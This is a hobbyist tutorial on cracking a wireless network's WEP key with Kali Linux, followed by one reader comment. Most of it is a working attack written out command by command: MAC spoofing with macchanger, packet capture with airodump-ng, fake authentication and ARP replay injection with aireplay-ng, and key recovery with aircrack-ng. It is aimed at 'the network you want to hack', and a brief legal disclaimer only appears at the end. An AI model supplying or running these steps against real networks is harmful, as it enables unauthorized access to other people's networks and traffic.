Cracking WEP

This chapter will teach you how to crack the WEP of a wireless network using Kali step by step. Kali is a free OS available for download at This tutorial is using Kali, but it should work similar in newer versions. Kali is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

What you will need:
Download the Kali flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the kali website.

Once you have booted up kali . 
Then you should see the desktop.

Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.

type in: airmon-ng

Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.

type: airmon-ng stop wlan0

type: macchanger --mac 00:11:22:33:44:55 wlan0

type: airmon-ng start wlan0

type: airodump-ng wlan0

You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.

type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0

Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0

type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0

Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on

open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap

You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)


Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only. Use at your own risk.

Thank you (zer0w0rm)

Published By : Zer0w0rm ~ Zer0w0rm



  1. Access point timeout get detected. and it will wait 60s and so on.. its time consuming .. i am unable to crack as i knew the wps pin too